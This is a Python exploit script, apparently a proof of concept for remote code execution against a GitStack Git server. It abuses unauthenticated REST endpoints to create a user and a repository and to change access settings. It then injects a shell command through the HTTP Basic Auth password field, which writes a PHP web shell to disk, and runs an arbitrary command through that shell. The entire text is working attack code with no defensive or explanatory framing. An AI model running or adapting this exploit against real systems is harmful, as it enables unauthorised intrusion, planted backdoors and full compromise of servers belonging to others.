import requestsfrom requests.auth import HTTPBasicAuthimport osimport sys

1. import requests
2. from requests.auth import HTTPBasicAuth
3. import os
4. import sys
5. from time import sleep
6.  
7. ip = "localhost:8000"
8.  
9. # What command you want to execute
10. command = 'whoami'
11.  
12. repository = 'rce'
13. username = 'rce'
14. password = 'rce'
15. csrf_token = 'token'
16.  
17. user_list = []
18.  
19. print ("[+] Get user list")
20. try:
21. r = requests.get("http://{}/rest/user/".format(ip))
22. user_list = r.json()
23. user_list.remove('everyone')
24. except:
25. pass
26.  
27. if len(user_list) > 0:
28. username = user_list[0]
29. print ("[+] Found user {}".format(username))
30. else:
31. r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password})
32. print ("[+] Create user")
33.  
34. if not "User created" in r.text and not "User already exist" in r.text:
35. print ("[-] Cannot create user")
36. os._exit(0)
37. sleep(3)
38. r = requests.get("http://{}/rest/settings/general/webinterface/".format(ip))
39. if "true" in r.text:
40. print ("[+] Web repository already enabled")
41. else:
42. print ("[+] Enable web repository")
43. r = requests.put("http://{}/rest/settings/general/webinterface/".format(ip), data='{"enabled" : "true"}')
44. if not "Web interface successfully enabled" in r.text:
45. print ("[-] Cannot enable web interface")
46. os._exit(0)
47. sleep(3)
48. print ("[+] Get repositories list")
49. r = requests.get("http://{}/rest/repository/".format(ip))
50. repository_list = r.json()
51.  
52. if len(repository_list) > 0:
53. repository = repository_list[0]['name']
54. print ("[+] Found repository {}".format(repository))
55. else:
56. print ("[+] Create repository")
57.  
58. r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token})
59. if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text:
60. print ("[-] Cannot create repository")
61. os._exit(0)
62. sleep(3)
63. print ("[+] Add user to repository")
64. r = requests.post("http://{}/rest/repository/{}/user/{}/".format(ip, repository, username))
65.  
66. if not "added to" in r.text and not "has already" in r.text:
67. print ("[-] Cannot add user to repository")
68. os._exit(0)
69.  
70. print ("[+] Disable access for anyone")
71. r = requests.delete("http://{}/rest/repository/{}/user/{}/".format(ip, repository, "everyone"))
72.  
73. if not "everyone removed from rce" in r.text and not "not in list" in r.text:
74. print ("[-] Cannot remove access for anyone")
75. os._exit(0)
76. sleep(3)
77. print ("[+] Create backdoor in PHP")
78. r = requests.get('http://{}/web/index.php?p={}.git&a=summary'.format(ip, repository), auth=HTTPBasicAuth(username, 'p && echo "<?php system($_POST[\'a\']); ?>" > c:\GitStack\gitphp\exploit-saltinbank.php'))
79. print (r.text.encode(sys.stdout.encoding, errors='replace'))
80. sleep(3)
81. print ("[+] Execute command")
82. r = requests.post("http://{}/web/exploit-saltinbank.php".format(ip), data={'a' : command})
83. print (r.text.encode(sys.stdout.encoding, errors='replace'))